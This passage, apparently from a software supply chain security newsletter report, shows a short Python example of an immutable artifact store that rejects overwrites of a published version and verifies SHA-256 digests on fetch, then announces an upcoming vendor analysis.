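        self._artifacts: dict[tuple[str, str], bytes] = {}

    def publish(self, name: str, version: str, content: bytes) -> str:
        """Store a new artifact and return its SHA-256 digest."""
        key = (name, version)
        if key in self._artifacts:
            # Re-publishing an existing version is how silent tampering happens.
            raise ValueError(f"{name} {version} already exists and cannot be replaced")
        self._artifacts[key] = content
        return hashlib.sha256(content).hexdigest()

    def fetch(self, name: str, version: str, expected_sha256: str) -> bytes:
        """Return the artifact only if it still matches the digest the caller pinned."""
        content = self._artifacts[(name, version)]
        if hashlib.sha256(content).hexdigest() != expected_sha256:
            raise ValueError(f"{name} {version} does not match the expected digest")
        return content


if __name__ == "__main__":
    store = ImmutableArtifactStore()
    digest = store.publish("example-app", "1.0.0", b"original build output")
    try:
        store.publish("example-app", "1.0.0", b"malicious replacement")
    except ValueError as error:
        print("rejected:", error)
    print("fetched bytes:", len(store.fetch("example-app", "1.0.0", digest)))
```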
Part 2 of the SSC Overview: Vendor Analysis
Many of the software supply chain vendors look similar on their websites or in how people perceive them. However, each of them approaches the SSC problem from a different angle or core competency.
We have analyzed more than 12 software supply chain vendors. In Part 2 of our SSC report, we provide a detailed analysis of each of the key vendors.
To make sure you see Part 2 when it’s published, make sure to subscribe to tl;dr sec, a free weekly update of the best tools, blog posts, and talks in cybersecurity across AppSec, cloud security, AI, supply chain security, and more!